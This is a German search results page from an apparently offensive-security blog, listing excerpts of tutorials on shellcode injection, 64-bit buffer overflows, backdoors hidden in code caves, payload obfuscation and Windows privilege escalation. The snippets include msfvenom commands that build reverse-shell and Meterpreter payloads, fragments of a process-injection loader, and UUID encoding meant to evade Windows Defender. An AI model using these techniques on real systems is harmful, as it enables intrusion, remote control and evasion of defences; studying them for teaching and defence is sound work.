Suche

Unten sind die Ergebnisse Ihrer Suche gelistet.

Passende Seitennamen:

Volltextergebnisse:

Shellcode Injection Teil 4
47 Treffer, Zuletzt geändert:
''calc.exe'' auf einem Windows Rechner * 64-Bit Code * Vermeiden von Null-Bytes ===== Vorbereitunge... st von [[https://www.ired.team/offensive-security/code-injection-process-injection/finding-kernel32-base... ich für den Aufbau des Shellcodes genutzt. ===== Code: Schritt für Schritt ===== Den kompletten Code findet ihr auch auf [[https://github.com/psycore8/nosoc
Obfuscation: polymorpher In-Memory Decoder
46 Treffer, Zuletzt geändert:
sten. Der Decoder startet mit dieser Anweisung: <code asm> _start: jmp short call_decoder ; Begin of JMP-CALL-POP </code> ''%%JMP-CALL-POP%%'' ist eine Technik, welche uns erlaubt Code unabhängig vom Speicher auszuführen. In diesem er... en wir nun zur Sprungmarke ''%%call_decoder%%'' <code asm> call_decoder: call decoder ; RSP
Buffer Overflow im 64-Bit Stack - Teil 3
39 Treffer, Zuletzt geändert:
der Funktion einen Systembefehl absetzen können <code gdb> [-------------------------------------code-------------------------------------] 0x4011de <vuln... >: mov eax,0x0 0x4011f7 <vuln+134>: leave </code> \\ \\ ===== Abhängigkeiten ===== * socat mod ... ps://docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python
Buffer Overflow im 64-Bit Stack - Teil 1
36 Treffer, Zuletzt geändert:
langen.((https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/6... s://github.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.gi... peda echo "source ~/peda/peda.py" >> ~/.gdbinit </code> \\ \\ ==== ASLR deaktivieren ==== ASLR muss dea... mit Speicherbereiche nicht randomisiert werden. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomiz
Backdoor development with Code Caves
35 Treffer, Zuletzt geändert:
utsch english}} ====== Backdoor development with Code Caves ====== {{:it-security:blog:bd-putty-header... xe%%'' that is unused in the resources (so-called code caves). ===== 1.0 Introduction ===== The following steps will be executed: * Identify the code cave * Change the access rights of the resource... Identify and hijack the function * Redirect the code flow * Test the backdoor ===== 2.0 Code Caves
Shellcode Injection Teil 1
30 Treffer, Zuletzt geändert:
| > shell.c | Speichere in die Datei shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST... ta_ga_nai -i 8 -b '\x00\x0d\x0a' -f c > shell.c </code> \\ \\ ===== C++ Injector ===== Wir erstellen un... = 540; int main(int argc, char** argv) { char* code; printf("#nosoc - expecttheunexpected"); code = (char*)VirtualAlloc(NULL, size, MEM_COMMIT,PAGE_E
Obfuscation: ByteSwapping
29 Treffer, Zuletzt geändert:
%%''|''%%F9%%''|''%%12%%''|''%%D1%%''| ===== Der Code ===== ==== Schritt 1: Python Encoder ==== Die e... hinzu * Gib das Bytearray als Ergebnis zurück <code python> def encrypt(data: bytes, xor_key: int... e = enc_byte return bytes(transformed) </code> ==== Schritt 2: Assembly ==== Nun muss das Ass... lüsselung wieder Rückgängig macht. Den kompletten Code findet Ihr am Ende des Beitrags. === Schritt 2.1
Shellcode Injection Teil 3
24 Treffer, Zuletzt geändert:
h kann es unter manchen Umständen nötig sein, den Code für die Shell erst im zweiten Schritt zu laden. ... u laden und anschließend auszuführen. \\ \\ ===== Code ===== ==== C++ Programm ==== Als erstes brauche... lädt und anschließend in diesen hineinspringt. <code cpp> ... //buf ist der Shellcode unsigned char bu... rthin __asm { mov eax, target jmp eax } } </code> Den kompletten Code findet Ihr im [[https://git
Buffer Overflow im 64-Bit Stack - Teil 2
22 Treffer, Zuletzt geändert:
568|kompilierte Binary]] aus dem Blog debuggen. <code bash> br *vuln+73 # setze Breakpoint r < i... "/bin/sh") RIP: 0x400469 (<_init+25>: ret) </code> \\ \\ ===== Abhängigkeiten ===== Was wird benöt... erflow_x64|Teil 1]], benötigen wir noch ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== ASLR deaktivieren ===== Auch hier muss ASLR wieder d
Shellcode Injection Teil 2
21 Treffer, Zuletzt geändert:
e|Github Repository]] herunterladen. \\ \\ ===== Code ===== ==== Erläuterung ==== Unser Code soll die PID des Zielprozesses als Parameter beim Start überge... %'', mit dem Rückgabewert des Programm-Handles. <code cpp> processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1]))); </code> Nun reservieren wir einen Speicherbereich für u
Obfuscation: Shellcode als UUIDs tarnen
18 Treffer, Zuletzt geändert:
rd in der Regel durch Windows Defender erkannt. <code bash> python shencode.py create -c="-p windows/x6... T=IPADDRESS LPORT=PORT -f raw -o shell_rev.raw" </code> ==== encoden ==== Dieses Payload encoden wir nun als UUID-Strings. <code bash> python shencode.py encode -f shell_rev.raw -u </code> Die Ausgabe sieht nun in etwas so aus: <code c
FatCat Attack PoC
14 Treffer, Zuletzt geändert:
um uns volle Rechte über ein System zu sichern. <code text> _____ _ ____ _ | ___|_ _| |_ ... | |_ |_| \__,_|\__|\____\__,_|\__| Attack PoC </code> \\ \\ ===== Beschreibung ===== {{page>vorlagen:... oad ==== * Metasploit starten * cmd öffnen <code dos>cmd</code> * Payload generieren <code dos>msfvenom -a x86 –platform windows -p windows/meterpre
Privilegien-Eskalation: Windows-Admin dank Linux
12 Treffer, Zuletzt geändert:
zt können wir ''chntpw'' installieren, mittels: <code bash> sudo apt install chntpw </code> \\ \\ ==== Windows Partition finden ==== Wir suchen die Windows Partition. <code bash> sudo sfdisk -l </code> {{:it-security:blog:screenshot_2024-03-14_145734.png|}} \\ \\ In unserem